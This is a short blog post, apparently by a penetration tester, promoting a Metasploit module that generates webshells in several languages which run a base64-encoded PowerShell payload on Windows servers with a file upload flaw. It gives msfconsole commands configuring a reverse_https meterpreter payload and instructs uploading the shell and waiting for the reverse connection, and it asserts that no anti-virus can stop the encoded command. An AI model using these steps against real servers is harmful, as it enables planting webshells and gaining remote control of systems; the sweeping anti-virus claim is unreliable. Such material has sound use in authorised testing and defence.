Many web applications come with the ability to upload files to the server. Some of these can be misconfigured and allow for arbitrary file upload. During these situations, this module for MetaSploit can come in handy if the backend server is Windows.

What can you do with this?

This module, authored by Scott Sutherland and myself, allows for webshells to be generated in different languages including JSP, PHP, ASP, ASPX, CFM, and a TXT file through the WEB_LANG option. This will then generate a base64 encoded PowerShell command that contains the defined MSF payload that will be passed to the Windows operating system and executed.

The advantage of running the base64 encoded PowerShell command is that no anti-virus products out there can stop this from running. The only caveats are that you need to know if it is a 32 or 64 bit Windows install, and you need to have local admin privileges from the webshell. However, if you can find a misconfigured server and want a quick and easy way to execute a MSF payload on the machine, this module is for you.

Requirements:

  1. A vulnerable file upload function
  2. The MetaSploit module hosted by Mubix on his pwnwiki GitHub

Usage:

root@bt:# msfconsole msf> use exploit/custom_path/ps_webshells msf> set OUT_DIR /tmp/ msf> set TARGET_ARCH 32 msf> set WEB_LANG ASPX msf> set PAYLOAD windows/meterpreter/reverse_https msf> set LHOST ip.ip.ip.ip msf> exploit

From here, all that’s left to do is upload the webshell, browse to the uploaded page, and wait for the return meterpreter shell to connect. Want more info on JSP web shells? Check out Scott’s blog on Hacking with JSP Shells.